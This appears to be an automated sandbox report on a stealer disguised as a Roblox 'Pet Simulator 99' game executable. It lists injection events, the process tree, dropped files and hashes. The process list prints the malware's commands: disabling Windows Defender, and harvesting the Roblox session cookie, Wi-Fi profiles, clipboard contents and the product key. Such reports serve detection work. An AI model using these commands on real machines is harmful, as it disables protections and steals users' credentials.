Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2600 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe
PID 2600 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe
PID 4116 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 3708 wrote to memory of 1488 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3708 wrote to memory of 1488 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3452 wrote to memory of 4704 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3452 wrote to memory of 4704 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4116 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 3816 wrote to memory of 2952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3816 wrote to memory of 2952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2456 wrote to memory of 4948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2456 wrote to memory of 4948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4116 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 1924 wrote to memory of 2756 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1924 wrote to memory of 2756 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1556 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1556 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1564 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1564 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1056 wrote to memory of 3164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1056 wrote to memory of 3164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3632 wrote to memory of 3544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3632 wrote to memory of 3544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 5112 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5112 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4004 wrote to memory of 2240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4004 wrote to memory of 2240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4116 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 3720 wrote to memory of 412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3720 wrote to memory of 412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4116 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 3280 wrote to memory of 3756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3280 wrote to memory of 3756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4116 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 2560 wrote to memory of 3360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2560 wrote to memory of 3360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4116 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 2748 wrote to memory of 2312 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2748 wrote to memory of 2312 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1908 wrote to memory of 3056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1908 wrote to memory of 3056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com

Processes

C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe

"C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe"

C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe

"C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64 payload omitted]

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wk133bt4\wk133bt4.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8916.tmp" "c:\Users\Admin\AppData\Local\Temp\wk133bt4\CSCFF828B6DEEF482799C0DE4D8EFA6D40.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffb3491ab58,0x7ffb3491ab68,0x7ffb3491ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1660 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2184 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3088 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3164 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4244 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4344 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4516 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4672 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4428 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4460 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3356 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2808 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:2

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\_MEI26002\python312.dll

C:\Users\Admin\AppData\Local\Temp\_MEI26002\VCRUNTIME140.dll

C:\Users\Admin\AppData\Local\Temp\_MEI26002\base_library.zip

C:\Users\Admin\AppData\Local\Temp\_MEI26002\_ctypes.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI26002\libffi-8.dll

C:\Users\Admin\AppData\Local\Temp\_MEI26002\_ssl.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI26002\_socket.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI26002\_sqlite3.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI26002\_queue.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI26002\_lzma.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI26002\_hashlib.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI26002\_decimal.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI26002\_bz2.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI26002\unicodedata.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI26002\sqlite3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI26002\select.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI26002\libssl-3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI26002\libcrypto-3.dll

memory/1488-53-0x00007FFB26A63000-0x00007FFB26A65000-memory.dmp

memory/1488-54-0x00007FFB26A60000-0x00007FFB27522000-memory.dmp

memory/1488-55-0x00007FFB26A60000-0x00007FFB27522000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0vv2y2ww.gkv.ps1

memory/1488-61-0x0000021D03B50000-0x0000021D03B72000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

memory/1488-147-0x00007FFB26A60000-0x00007FFB27522000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\wk133bt4\wk133bt4.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\wk133bt4\wk133bt4.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\wk133bt4\CSCFF828B6DEEF482799C0DE4D8EFA6D40.TMP

C:\Users\Admin\AppData\Local\Temp\RES8916.tmp

memory/2748-166-0x0000016AFE5E0000-0x0000016AFE5E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wk133bt4\wk133bt4.dll

MD5 cb731908f89125bb1e9903c0df0550e0
SHA1 e5f334642193223b115f578eda6c15abd22d5040
SHA256 09c0e7fa16271ae6ed865a999218060d1661fe159daae53f887e6c2efa5fd886
SHA512 3885783bf1e8c809e659f24f5ca3516105a11f3a5da8edd751cc34a7dae72c19e734f9e3db3f9975bfe1fe2c0cffc381ce1f6ffefd12fce596e1524d2ffe856e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dc7ef1c5ad99410b0df1205afd6c30c8
SHA1 d97fb084ac7afbe8a0fe1dfe0600b62d1bfbc040
SHA256 b1a4fd3e475a775a4a004a0a7eadcac0071fb823161cef420870f7699f0fe1fb
SHA512 b3f604f857492c0a7812b7dd483f7df559d5c459cc11cdf757a1d940ebecc88960e2398fdde3ab6cfb8e76a47bd17135ce15a1a20477f8c4ded1f39f49f0727c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

